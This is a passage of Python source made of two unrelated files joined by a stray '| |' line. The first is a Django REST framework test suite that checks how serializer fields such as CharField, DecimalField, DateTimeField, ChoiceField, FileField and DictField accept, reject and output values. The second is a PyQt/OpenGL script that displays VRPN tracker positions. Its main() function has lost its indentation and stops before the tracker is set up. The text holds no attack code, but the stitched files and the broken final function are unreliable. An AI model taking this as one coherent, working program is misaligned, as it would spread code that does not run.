        """Surrounding whitespace is stripped by default."""
        field = serializers.CharField()
        assert field.to_internal_value(' abc ') == 'abc'

    def test_trim_whitespace_disabled(self):
        """`trim_whitespace=False` preserves surrounding whitespace."""
        field = serializers.CharField(trim_whitespace=False)
        assert field.to_internal_value(' abc ') == ' abc '
class TestEmailField(FieldValues):
    """
    Valid and invalid values for `EmailField`.
    """
    valid_inputs = {
        'example@example.com': 'example@example.com',
        # Surrounding whitespace is trimmed before validation.
        ' example@example.com ': 'example@example.com',
    }
    invalid_inputs = {
        'examplecom': ['Enter a valid email address.']
    }
    outputs = {}
    field = serializers.EmailField()
class TestRegexField(FieldValues):
    """
    Valid and invalid values for `RegexField`.
    """
    valid_inputs = {
        'a9': 'a9',
    }
    invalid_inputs = {
        # The pattern is case-sensitive: uppercase fails [a-z].
        'A9': ["This value does not match the required pattern."]
    }
    outputs = {}
    field = serializers.RegexField(regex='[a-z][0-9]')
class TestSlugField(FieldValues):
    """
    Valid and invalid values for `SlugField`.
    """
    valid_inputs = {
        'slug-99': 'slug-99',
    }
    invalid_inputs = {
        # Spaces are not permitted in slugs.
        'slug 99': ['Enter a valid "slug" consisting of letters, numbers, underscores or hyphens.']
    }
    outputs = {}
    field = serializers.SlugField()
class TestURLField(FieldValues):
    """
    Valid and invalid values for `URLField`.
    """
    valid_inputs = {
        'http://example.com': 'http://example.com',
    }
    invalid_inputs = {
        # A bare domain without a scheme is rejected.
        'example.com': ['Enter a valid URL.']
    }
    outputs = {}
    field = serializers.URLField()
class TestUUIDField(FieldValues):
    """
    Valid and invalid values for `UUIDField`.
    """
    valid_inputs = {
        '825d7aeb-05a9-45b5-a5b7-05df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
        # The hyphenless hex form is also accepted on input.
        '825d7aeb05a945b5a5b705df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda')
    }
    invalid_inputs = {
        '825d7aeb-05a9-45b5-a5b7': ['"825d7aeb-05a9-45b5-a5b7" is not a valid UUID.']
    }
    outputs = {
        # Output is the canonical hyphenated string form.
        uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'): '825d7aeb-05a9-45b5-a5b7-05df87923cda'
    }
    field = serializers.UUIDField()
# Number types...
class TestIntegerField(FieldValues):
    """
    Valid and invalid values for `IntegerField`.
    """
    valid_inputs = {
        '1': 1,
        '0': 0,
        1: 1,
        0: 0,
        # Whole-number floats (and their string form) coerce cleanly.
        1.0: 1,
        0.0: 0,
        '1.0': 1
    }
    invalid_inputs = {
        # Fractional values are rejected rather than truncated.
        0.5: ['A valid integer is required.'],
        'abc': ['A valid integer is required.'],
        '0.5': ['A valid integer is required.']
    }
    outputs = {
        '1': 1,
        '0': 0,
        1: 1,
        0: 0,
        1.0: 1,
        0.0: 0
    }
    field = serializers.IntegerField()
class TestMinMaxIntegerField(FieldValues):
    """
    Valid and invalid values for `IntegerField` with min and max limits.
    """
    valid_inputs = {
        # Bounds are inclusive: 1 and 3 themselves validate.
        '1': 1,
        '3': 3,
        1: 1,
        3: 3,
    }
    invalid_inputs = {
        0: ['Ensure this value is greater than or equal to 1.'],
        4: ['Ensure this value is less than or equal to 3.'],
        '0': ['Ensure this value is greater than or equal to 1.'],
        '4': ['Ensure this value is less than or equal to 3.'],
    }
    outputs = {}
    field = serializers.IntegerField(min_value=1, max_value=3)
class TestFloatField(FieldValues):
    """
    Valid and invalid values for `FloatField`.
    """
    valid_inputs = {
        '1': 1.0,
        '0': 0.0,
        1: 1.0,
        0: 0.0,
        1.0: 1.0,
        0.0: 0.0,
    }
    invalid_inputs = {
        'abc': ["A valid number is required."]
    }
    outputs = {
        '1': 1.0,
        '0': 0.0,
        1: 1.0,
        0: 0.0,
        1.0: 1.0,
        0.0: 0.0,
    }
    field = serializers.FloatField()
class TestMinMaxFloatField(FieldValues):
    """
    Valid and invalid values for `FloatField` with min and max limits.
    """
    valid_inputs = {
        # Bounds are inclusive: 1 and 3 themselves validate.
        '1': 1,
        '3': 3,
        1: 1,
        3: 3,
        1.0: 1.0,
        3.0: 3.0,
    }
    invalid_inputs = {
        0.9: ['Ensure this value is greater than or equal to 1.'],
        3.1: ['Ensure this value is less than or equal to 3.'],
        '0.0': ['Ensure this value is greater than or equal to 1.'],
        '3.1': ['Ensure this value is less than or equal to 3.'],
    }
    outputs = {}
    field = serializers.FloatField(min_value=1, max_value=3)
class TestDecimalField(FieldValues):
    """
    Valid and invalid values for `DecimalField`.
    """
    valid_inputs = {
        '12.3': Decimal('12.3'),
        '0.1': Decimal('0.1'),
        10: Decimal('10'),
        0: Decimal('0'),
        12.3: Decimal('12.3'),
        0.1: Decimal('0.1'),
        # Scientific notation is accepted.
        '2E+2': Decimal('200'),
    }
    # A list of two-tuples rather than a dict: NaN is unequal to itself,
    # so Decimal('Nan') cannot be used reliably as a dict key.
    invalid_inputs = (
        ('abc', ["A valid number is required."]),
        (Decimal('Nan'), ["A valid number is required."]),
        (Decimal('Inf'), ["A valid number is required."]),
        ('12.345', ["Ensure that there are no more than 3 digits in total."]),
        ('0.01', ["Ensure that there are no more than 1 decimal places."]),
        (123, ["Ensure that there are no more than 2 digits before the decimal point."])
    )
    outputs = {
        # Output is quantized to 1 decimal place and coerced to a string.
        '1': '1.0',
        '0': '0.0',
        '1.09': '1.1',
        '0.04': '0.0',
        1: '1.0',
        0: '0.0',
        Decimal('1.0'): '1.0',
        Decimal('0.0'): '0.0',
        Decimal('1.09'): '1.1',
        Decimal('0.04'): '0.0'
    }
    field = serializers.DecimalField(max_digits=3, decimal_places=1)
class TestMinMaxDecimalField(FieldValues):
    """
    Valid and invalid values for `DecimalField` with min and max limits.
    """
    valid_inputs = {
        # Bounds are inclusive: 10.0 and 20.0 themselves validate.
        '10.0': Decimal('10.0'),
        '20.0': Decimal('20.0'),
    }
    invalid_inputs = {
        '9.9': ['Ensure this value is greater than or equal to 10.'],
        '20.1': ['Ensure this value is less than or equal to 20.'],
    }
    outputs = {}
    field = serializers.DecimalField(
        max_digits=3, decimal_places=1,
        min_value=10, max_value=20
    )
class TestNoStringCoercionDecimalField(FieldValues):
    """
    Output values for `DecimalField` with `coerce_to_string=False`.
    """
    valid_inputs = {}
    invalid_inputs = {}
    outputs = {
        # Values are still quantized, but returned as Decimal, not str.
        1.09: Decimal('1.1'),
        0.04: Decimal('0.0'),
        '1.09': Decimal('1.1'),
        '0.04': Decimal('0.0'),
        Decimal('1.09'): Decimal('1.1'),
        Decimal('0.04'): Decimal('0.0'),
    }
    field = serializers.DecimalField(
        max_digits=3, decimal_places=1,
        coerce_to_string=False
    )
# Date & time serializers...
class TestDateField(FieldValues):
    """
    Valid and invalid values for `DateField`.
    """
    valid_inputs = {
        '2001-01-01': datetime.date(2001, 1, 1),
        datetime.date(2001, 1, 1): datetime.date(2001, 1, 1),
    }
    invalid_inputs = {
        'abc': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
        '2001-99-99': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
        # A datetime is explicitly rejected rather than silently truncated.
        datetime.datetime(2001, 1, 1, 12, 00): ['Expected a date but got a datetime.'],
    }
    outputs = {
        datetime.date(2001, 1, 1): '2001-01-01',
        '2001-01-01': '2001-01-01',
        # None and the empty string pass through as None on output.
        None: None,
        '': None,
    }
    field = serializers.DateField()
class TestCustomInputFormatDateField(FieldValues):
    """
    Valid and invalid values for `DateField` with a custom input format.
    """
    valid_inputs = {
        '1 Jan 2001': datetime.date(2001, 1, 1),
    }
    invalid_inputs = {
        # The default ISO format is no longer accepted once input_formats
        # is overridden.
        '2001-01-01': ['Date has wrong format. Use one of these formats instead: DD [Jan-Dec] YYYY.']
    }
    outputs = {}
    field = serializers.DateField(input_formats=['%d %b %Y'])
class TestCustomOutputFormatDateField(FieldValues):
    """
    Values for `DateField` with a custom output format.
    """
    valid_inputs = {}
    invalid_inputs = {}
    outputs = {
        datetime.date(2001, 1, 1): '01 Jan 2001'
    }
    field = serializers.DateField(format='%d %b %Y')
class TestNoOutputFormatDateField(FieldValues):
    """
    Values for `DateField` with no output format.
    """
    valid_inputs = {}
    invalid_inputs = {}
    outputs = {
        # format=None means to_representation returns the date object as-is.
        datetime.date(2001, 1, 1): datetime.date(2001, 1, 1)
    }
    field = serializers.DateField(format=None)
class TestDateTimeField(FieldValues):
    """
    Valid and invalid values for `DateTimeField`.
    """
    # Naive inputs are localized to the field's default timezone (UTC).
    valid_inputs = {
        '2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
        '2001-01-01T13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
        '2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
        datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
        datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
        # Django 1.4 does not support timezone string parsing.
        '2001-01-01T14:00+01:00' if (django.VERSION > (1, 4)) else '2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC())
    }
    invalid_inputs = {
        'abc': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
        '2001-99-99T99:00': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
        datetime.date(2001, 1, 1): ['Expected a datetime but got a date.'],
    }
    outputs = {
        datetime.datetime(2001, 1, 1, 13, 00): '2001-01-01T13:00:00',
        datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): '2001-01-01T13:00:00Z'
    }
    field = serializers.DateTimeField(default_timezone=timezone.UTC())
class TestCustomInputFormatDateTimeField(FieldValues):
    """
    Valid and invalid values for `DateTimeField` with a custom input format.
    """
    valid_inputs = {
        '1:35pm, 1 Jan 2001': datetime.datetime(2001, 1, 1, 13, 35, tzinfo=timezone.UTC()),
    }
    # The default ISO format is rejected once a custom format is set.
    invalid_inputs = {
        '2001-01-01T20:50': ['Datetime has wrong format. Use one of these formats instead: hh:mm[AM|PM], DD [Jan-Dec] YYYY.']
    }
    outputs = {}
    field = serializers.DateTimeField(default_timezone=timezone.UTC(), input_formats=['%I:%M%p, %d %b %Y'])
class TestCustomOutputFormatDateTimeField(FieldValues):
    """
    Values for `DateTimeField` with a custom output format.
    """
    valid_inputs = {}
    invalid_inputs = {}
    # '%I:%M%p, %d %b %Y' renders as e.g. '01:00PM, 01 Jan 2001'.
    outputs = {
        datetime.datetime(2001, 1, 1, 13, 00): '01:00PM, 01 Jan 2001',
    }
    field = serializers.DateTimeField(format='%I:%M%p, %d %b %Y')
class TestNoOutputFormatDateTimeField(FieldValues):
    """
    Values for `DateTimeField` with no output format.
    """
    valid_inputs = {}
    invalid_inputs = {}
    # With format=None the datetime object is passed through unchanged.
    outputs = {
        datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00),
    }
    field = serializers.DateTimeField(format=None)
class TestNaiveDateTimeField(FieldValues):
    """
    Valid and invalid values for `DateTimeField` with naive datetimes.
    """
    # With default_timezone=None, aware inputs are converted to naive ones.
    valid_inputs = {
        datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00),
        '2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00),
    }
    invalid_inputs = {}
    outputs = {}
    field = serializers.DateTimeField(default_timezone=None)
class TestTimeField(FieldValues):
    """
    Valid and invalid values for `TimeField`.
    """
    valid_inputs = {
        '13:00': datetime.time(13, 00),
        datetime.time(13, 00): datetime.time(13, 00),
    }
    invalid_inputs = {
        'abc': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
        '99:99': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
    }
    # Default output format always includes seconds.
    outputs = {
        datetime.time(13, 00): '13:00:00'
    }
    field = serializers.TimeField()
class TestCustomInputFormatTimeField(FieldValues):
    """
    Valid and invalid values for `TimeField` with a custom input format.
    """
    valid_inputs = {
        '1:00pm': datetime.time(13, 00),
    }
    # The default ISO format is rejected once a custom format is set.
    invalid_inputs = {
        '13:00': ['Time has wrong format. Use one of these formats instead: hh:mm[AM|PM].'],
    }
    outputs = {}
    field = serializers.TimeField(input_formats=['%I:%M%p'])
class TestCustomOutputFormatTimeField(FieldValues):
    """
    Values for `TimeField` with a custom output format.
    """
    valid_inputs = {}
    invalid_inputs = {}
    # '%I:%M%p' renders as e.g. '01:00PM'.
    outputs = {
        datetime.time(13, 00): '01:00PM'
    }
    field = serializers.TimeField(format='%I:%M%p')
class TestNoOutputFormatTimeField(FieldValues):
    """
    Values for `TimeField` with no output format.
    """
    valid_inputs = {}
    invalid_inputs = {}
    # With format=None the time object is passed through unchanged.
    outputs = {
        datetime.time(13, 00): datetime.time(13, 00)
    }
    field = serializers.TimeField(format=None)
@pytest.mark.skipif(django.VERSION < (1, 8),
                    reason='DurationField is only available for django1.8+')
class TestDurationField(FieldValues):
    """
    Valid and invalid values for `DurationField`.
    """
    valid_inputs = {
        '13': datetime.timedelta(seconds=13),
        '3 08:32:01.000123': datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
        '08:01': datetime.timedelta(minutes=8, seconds=1),
        datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
    }
    invalid_inputs = {
        'abc': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
        '3 08:32 01.123': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
    }
    outputs = {
        datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): '3 08:32:01.000123',
    }
    # Guard the class attribute too: serializers.DurationField does not
    # exist before Django 1.8, so it can't be evaluated unconditionally.
    if django.VERSION >= (1, 8):
        field = serializers.DurationField()
# Choice types...
class TestChoiceField(FieldValues):
    """
    Valid and invalid values for `ChoiceField`.
    """
    valid_inputs = {
        'poor': 'poor',
        'medium': 'medium',
        'good': 'good',
    }
    invalid_inputs = {
        'amazing': ['"amazing" is not a valid choice.']
    }
    # Output is not validated against the choices, so unknown values and
    # the empty string pass straight through.
    outputs = {
        'good': 'good',
        '': '',
        'amazing': 'amazing',
    }
    field = serializers.ChoiceField(
        choices=[
            ('poor', 'Poor quality'),
            ('medium', 'Medium quality'),
            ('good', 'Good quality'),
        ]
    )
    def test_allow_blank(self):
        """
        If `allow_blank=True` then '' is a valid input.
        """
        field = serializers.ChoiceField(
            allow_blank=True,
            choices=[
                ('poor', 'Poor quality'),
                ('medium', 'Medium quality'),
                ('good', 'Good quality'),
            ]
        )
        output = field.run_validation('')
        assert output == ''
class TestChoiceFieldWithType(FieldValues):
    """
    Valid and invalid values for a `Choice` field that uses an integer type,
    instead of a char type.
    """
    # String inputs are coerced to the choice's native (int) type.
    valid_inputs = {
        '1': 1,
        3: 3,
    }
    invalid_inputs = {
        5: ['"5" is not a valid choice.'],
        'abc': ['"abc" is not a valid choice.']
    }
    outputs = {
        '1': 1,
        1: 1
    }
    field = serializers.ChoiceField(
        choices=[
            (1, 'Poor quality'),
            (2, 'Medium quality'),
            (3, 'Good quality'),
        ]
    )
class TestChoiceFieldWithListChoices(FieldValues):
    """
    Valid and invalid values for a `Choice` field that uses a flat list for the
    choices, rather than a list of pairs of (`value`, `description`).
    """
    valid_inputs = {
        'poor': 'poor',
        'medium': 'medium',
        'good': 'good',
    }
    invalid_inputs = {
        'awful': ['"awful" is not a valid choice.']
    }
    outputs = {
        'good': 'good'
    }
    field = serializers.ChoiceField(choices=('poor', 'medium', 'good'))
class TestMultipleChoiceField(FieldValues):
    """
    Valid and invalid values for `MultipleChoiceField`.
    """
    # Sequence inputs deserialize to a set of the selected values.
    valid_inputs = {
        (): set(),
        ('aircon',): set(['aircon']),
        ('aircon', 'manual'): set(['aircon', 'manual']),
    }
    invalid_inputs = {
        'abc': ['Expected a list of items but got type "str".'],
        ('aircon', 'incorrect'): ['"incorrect" is not a valid choice.']
    }
    outputs = [
        (['aircon', 'manual', 'incorrect'], set(['aircon', 'manual', 'incorrect']))
    ]
    field = serializers.MultipleChoiceField(
        choices=[
            ('aircon', 'AirCon'),
            ('manual', 'Manual drive'),
            ('diesel', 'Diesel'),
        ]
    )
    def test_against_partial_and_full_updates(self):
        # Missing keys in HTML input mean "no selection" on a full update,
        # but "leave unchanged" (empty sentinel) on a partial update.
        # serializer = self.Serializer(data=MockHTMLDict())
        from django.http import QueryDict
        field = serializers.MultipleChoiceField(choices=(('a', 'a'), ('b', 'b')))
        field.partial = False
        assert field.get_value(QueryDict({})) == []
        field.partial = True
        assert field.get_value(QueryDict({})) == rest_framework.fields.empty
# File serializers...
class MockFile:
    """Lightweight stand-in for an uploaded-file object, exposing just the
    `name`, `size` and `url` attributes the file-field tests need."""
    def __init__(self, name='', size=0, url=''):
        self.name = name
        self.size = size
        self.url = url
    def __eq__(self, other):
        # Two mock files are equal when all three attributes match.
        if not isinstance(other, MockFile):
            return False
        return (self.name, self.size, self.url) == (other.name, other.size, other.url)
class TestFileField(FieldValues):
    """
    Values for `FileField`.
    """
    valid_inputs = [
        (MockFile(name='example', size=10), MockFile(name='example', size=10))
    ]
    invalid_inputs = [
        ('invalid', ['The submitted data was not a file. Check the encoding type on the form.']),
        (MockFile(name='example.txt', size=0), ['The submitted file is empty.']),
        (MockFile(name='', size=10), ['No filename could be determined.']),
        (MockFile(name='x' * 100, size=10), ['Ensure this filename has at most 10 characters (it has 100).'])
    ]
    # Default representation is the file's URL; empty values become None.
    outputs = [
        (MockFile(name='example.txt', url='/example.txt'), '/example.txt'),
        ('', None)
    ]
    field = serializers.FileField(max_length=10)
# NOTE(review): class name was probably meant to be `TestFileFieldWithName`;
# kept as-is so existing test IDs don't change.
class TestFieldFieldWithName(FieldValues):
    """
    Values for `FileField` with a filename output instead of URLs.
    """
    valid_inputs = {}
    invalid_inputs = {}
    outputs = [
        (MockFile(name='example.txt', url='/example.txt'), 'example.txt')
    ]
    field = serializers.FileField(use_url=False)
# Stub out mock Django `forms.ImageField` class so we don't *actually*
# call into its regular validation, or require PIL for testing.
class FailImageValidation(object):
    # Stand-in for Django's forms.ImageField that always rejects the upload.
    def to_python(self, value):
        raise serializers.ValidationError(self.error_messages['invalid_image'])
class PassImageValidation(object):
    # Stand-in for Django's forms.ImageField that accepts any upload as-is.
    def to_python(self, value):
        return value
class TestInvalidImageField(FieldValues):
    """
    Values for an invalid `ImageField`.
    """
    valid_inputs = {}
    invalid_inputs = [
        (MockFile(name='example.txt', size=10), ['Upload a valid image. The file you uploaded was either not an image or a corrupted image.'])
    ]
    outputs = {}
    # Inject the always-failing stub in place of Django's real ImageField.
    field = serializers.ImageField(_DjangoImageField=FailImageValidation)
class TestValidImageField(FieldValues):
    """
    Values for a valid `ImageField`.
    """
    valid_inputs = [
        (MockFile(name='example.txt', size=10), MockFile(name='example.txt', size=10))
    ]
    invalid_inputs = {}
    outputs = {}
    # Inject the always-passing stub in place of Django's real ImageField.
    field = serializers.ImageField(_DjangoImageField=PassImageValidation)
# Composite serializers...
class TestListField(FieldValues):
    """
    Values for `ListField` with IntegerField as child.
    """
    valid_inputs = [
        ([1, 2, 3], [1, 2, 3]),
        (['1', '2', '3'], [1, 2, 3])
    ]
    invalid_inputs = [
        ('not a list', ['Expected a list of items but got type "str".']),
        ([1, 2, 'error'], ['A valid integer is required.'])
    ]
    # Each element is coerced by the child IntegerField on output too.
    outputs = [
        ([1, 2, 3], [1, 2, 3]),
        (['1', '2', '3'], [1, 2, 3])
    ]
    field = serializers.ListField(child=serializers.IntegerField())
class TestUnvalidatedListField(FieldValues):
    """
    Values for `ListField` with no `child` argument.
    """
    # Without a child field, elements pass through unvalidated and uncoerced.
    valid_inputs = [
        ([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
    ]
    invalid_inputs = [
        ('not a list', ['Expected a list of items but got type "str".']),
    ]
    outputs = [
        ([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
    ]
    field = serializers.ListField()
class TestDictField(FieldValues):
    """
    Values for `DictField` with CharField as child.
    """
    # Keys are coerced to strings; values are coerced by the child CharField.
    valid_inputs = [
        ({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
    ]
    invalid_inputs = [
        ({'a': 1, 'b': None}, ['This field may not be null.']),
        ('not a dict', ['Expected a dictionary of items but got type "str".']),
    ]
    outputs = [
        ({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
    ]
    field = serializers.DictField(child=serializers.CharField())
class TestUnvalidatedDictField(FieldValues):
    """
    Values for `DictField` with no `child` argument.
    """
    # Keys are still stringified, but values pass through unvalidated.
    valid_inputs = [
        ({'a': 1, 'b': [4, 5, 6], 1: 123}, {'a': 1, 'b': [4, 5, 6], '1': 123}),
    ]
    invalid_inputs = [
        ('not a dict', ['Expected a dictionary of items but got type "str".']),
    ]
    outputs = [
        ({'a': 1, 'b': [4, 5, 6]}, {'a': 1, 'b': [4, 5, 6]}),
    ]
    field = serializers.DictField()
# Tests for FileField.
# ---------------------
class MockRequest:
    """Minimal request stub exposing only the build_absolute_uri() hook
    that FileField uses when a request is present in the context."""
    def build_absolute_uri(self, value):
        # Prepend a fixed scheme + host to the relative URL.
        host = 'http://example.com'
        return host + value
class TestFileFieldContext:
    def test_fully_qualified_when_request_in_context(self):
        # When a request is available in the serializer context, FileField
        # returns a fully-qualified URL rather than a relative path.
        field = serializers.FileField(max_length=10)
        field._context = {'request': MockRequest()}
        obj = MockFile(name='example.txt', url='/example.txt')
        value = field.to_representation(obj)
        assert value == 'http://example.com/example.txt'
# Tests for SerializerMethodField.
# --------------------------------
class TestSerializerMethodField:
    def test_serializer_method_field(self):
        # The default method name is `get_<field_name>` on the serializer.
        class ExampleSerializer(serializers.Serializer):
            example_field = serializers.SerializerMethodField()
            def get_example_field(self, obj):
                return 'ran get_example_field(%d)' % obj['example_field']
        serializer = ExampleSerializer({'example_field': 123})
        assert serializer.data == {
            'example_field': 'ran get_example_field(123)'
        }
    def test_redundant_method_name(self):
        # Explicitly passing the default method name is an error.
        class ExampleSerializer(serializers.Serializer):
            example_field = serializers.SerializerMethodField('get_example_field')
        with pytest.raises(AssertionError) as exc_info:
            ExampleSerializer().fields
        assert str(exc_info.value) == (
            "It is redundant to specify `get_example_field` on "
            "SerializerMethodField 'example_field' in serializer "
            "'ExampleSerializer', because it is the same as the default "
            "method name. Remove the `method_name` argument."
        )
| |
#!/usr/bin/python
#
# Small program to examine positional data from a VRPN tracker
#
# Requirements:
# apt-get install python-qt python-qt-gl
#
import sys
import math
import time
import optparse
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtOpenGL import *
from OpenGL.GL import *
from OpenGL.GLU import *
sys.path.append(".")
import vrpn_Tracker
VERBOSE = False
#
class GLCamera:
    """Simple orbit camera: the eye sits on a cylinder around the origin
    (radius, height, angle) and always looks at the origin with +y up."""
    def __init__(self):
        self.angle = 0    # orbit angle around the y axis, radians
        self.radius = 10  # distance from the y axis
        self.height = 2   # eye height above the grid plane
        pass
    def gluLookAt(self):
        # NOTE: the method shadows GLU's gluLookAt only as an attribute name;
        # the call below still resolves to the module-level GLU function.
        x = self.radius * math.sin(self.angle)
        y = self.height
        z = self.radius * math.cos(self.angle)
        gluLookAt(x, y, z,
                  0.0, 0.0, 0.0,
                  0.0, 1.0, 0.0)
        pass
    pass
#
def convert_to_glmatrix(pos, quat):
    """Build a column-major 4x4 OpenGL transform (16-element list) from a
    position vector and a quaternion given as (x, y, z, w)."""
    qx, qy, qz, qw = quat[0], quat[1], quat[2], quat[3]
    # Doubled components, reused by every product below.
    x2 = qx * 2
    y2 = qy * 2
    z2 = qz * 2
    xx = x2 * qx; xy = x2 * qy; xz = x2 * qz
    yy = y2 * qy; yz = y2 * qz
    zz = z2 * qz
    sx = qw * x2; sy = qw * y2; sz = qw * z2
    # Rotation in the upper-left 3x3 (column-major), translation in the
    # last column, as expected by glMultMatrixf.
    return [
        1.0 - (yy + zz), (xy + sz),       (xz - sy),       0,
        (xy - sz),       1.0 - (xx + zz), (yz + sx),       0,
        (xz + sy),       (yz - sx),       1.0 - (xx + yy), 0,
        pos[0],          pos[1],          pos[2],          1.0,
    ]
#
def draw_grid(scale):
    """Draw a unit-spaced reference grid on the y=0 plane.

    Lines run from -scale to +scale along both x and z. The original
    hard-coded `range(-5, 6)` while the line extent used `scale`, so the
    grid only lined up for scale == 5; derive the range from scale instead
    (identical output for the existing scale=5 caller).
    """
    s = scale
    extent = int(s)
    glLineWidth(1)
    #glColor4f(0.9, 0.9, 0.9, 0.9)
    glBegin(GL_LINES)
    # Lines parallel to the z axis, then lines parallel to the x axis.
    for i in range(-extent, extent + 1):
        glVertex3f(i, 0, s)
        glVertex3f(i, 0, -s)
    for i in range(-extent, extent + 1):
        glVertex3f(s, 0, i)
        glVertex3f(-s, 0, i)
    glEnd()
#
def draw_axes(scale):
    # Draw the three coordinate axes at the origin, each `scale` units long:
    # x = red, y = green, z = blue (slightly lightened for visibility).
    s = scale
    glLineWidth(2)
    glBegin(GL_LINES)
    glColor3f(1,0,0) # x - r
    glVertex3f(0,0,0)
    glVertex3f(s,0,0)
    glColor3f(0,1,0) # y - g
    glVertex3f(0,0,0)
    glVertex3f(0,s,0)
    glColor3f(0.2,0.2,1) # z - b
    glVertex3f(0,0,0)
    glVertex3f(0,0,s)
    glEnd()
    pass
#
class ViewWidget3D(QGLWidget):
    """OpenGL viewport that renders VRPN-tracked points (position and
    orientation) on a reference grid, with mouse-drag orbit and wheel zoom."""
    def __init__(self, parent):
        QGLWidget.__init__(self, parent)
        self.setFocusPolicy(Qt.StrongFocus)
        self.lastmousepos = None
        self.camera = GLCamera()
        self.quadric = gluNewQuadric()
        # Guards self.points: written by the VRPN thread via handler(),
        # read by paintGL() on the GUI thread.
        self.mutex = QMutex()
        self.points = {}
        pass
    def initializeGL(self):
        QGLWidget.initializeGL(self)
        glClearColor(0,0,0,1)
        pass
    def resizeGL(self, w, h):
        glViewport(0, 0, w, h)
        pass
    def paintGL(self):
        QGLWidget.paintGL(self)
        # erase previous frame
        glClear(GL_COLOR_BUFFER_BIT)
        # setup matrices
        glMatrixMode(GL_PROJECTION)
        glLoadIdentity()
        gluPerspective(45, self.width()/float(self.height()), 1, 100)
        glMatrixMode(GL_MODELVIEW)
        glLoadIdentity()
        self.camera.gluLookAt()
        # grid
        glPushMatrix()
        glColor4f(1,1,1,1)
        draw_grid(5)
        glPopMatrix()
        # axes
        glPushMatrix()
        draw_axes(1)
        glPopMatrix()
        # points: each entry is (x, y, z, qx, qy, qz, qw) from the tracker
        radius = 0.05
        self.mutex.lock()
        glColor4f(1,1,1,1)
        for id in self.points:
            p = self.points[id]
            try: pos, quat = p[0:3], p[3:]
            except: pass
            m = convert_to_glmatrix(pos, quat)
            glPushMatrix()
            glMultMatrixf(m)
            gluSphere(self.quadric, radius, 4,4)
            # label the sphere with its sensor id
            self.renderText(radius, radius, radius, "%d"%(id,))
            draw_axes(0.1)
            glPopMatrix()
            pass
        self.mutex.unlock()
        pass
    def mouseMoveEvent(self, event):
        # First move after a press only records the position.
        if self.lastmousepos == None:
            self.lastmousepos = QVector2D(event.x(), event.y())
            return
        newpos = QVector2D(event.x(), event.y())
        dt = newpos - self.lastmousepos
        self.lastmousepos = newpos
        # Horizontal drag orbits the camera, vertical drag raises/lowers it.
        self.camera.angle -= dt.x() / self.width() * 2
        self.camera.height -= dt.y() / self.height() * 2
        self.update()
        pass
    def mousePressEvent(self, event):
        pass
    def mouseReleaseEvent(self, event):
        self.lastmousepos = None
        pass
    def wheelEvent(self, event):
        # Wheel zooms by scaling the orbit radius.
        if(event.delta() > 0):
            self.camera.radius *= 0.9
        else:
            self.camera.radius *= 1.1
            pass
        self.update()
        pass
    def keyReleaseEvent(self, event):
        if event.text() == 'q':
            pass
        self.update()
        pass
    def handler(self, userdata, t):
        # Tracker-change callback, invoked from the VRPN polling thread;
        # t is expected to be (sensor_id, x, y, z, qx, qy, qz, qw).
        if VERBOSE:
            print userdata, t
            pass
        self.mutex.lock()
        try:
            self.points[t[0]] = t[1:]
            pass
        except:
            print "unknown data: ", t
            pass
        self.mutex.unlock()
        self.update()
        pass
    pass
#
class mainthread(QThread):
    """Background thread that pumps the VRPN tracker's mainloop forever."""
    def __init__(self, tracker, widget):
        QThread.__init__(self)
        self.tracker = tracker
        self.widget = widget
        pass
    def run(self):
        # Busy-poll the tracker; sleep(0) just yields the CPU between polls.
        while True:
            self.tracker.mainloop()
            time.sleep(0)
            pass
        pass
    pass
#
def main(argv):
global VERBOSE
# parse command line
parser = optparse.OptionParser()
parser.add_option("-v", "--verbose", dest="verbose", default=False, action="store_true")
options, args = parser.parse_args()
if len(args) < 1:
print "no tracker specified (Example: Tracker0@localhost)"
return
print "using tracker: ", args[0]
if options.verbose:
print "verbose mode"
VERBOSE = True
pass
# create QT widgets
app = QApplication(argv)
mw = QMainWindow()
widget = ViewWidget3D(mw)
mw.setCentralWidget(widget)
mw.resize(800,600)
mw.show()
# create VRPN tracker and register change handlers
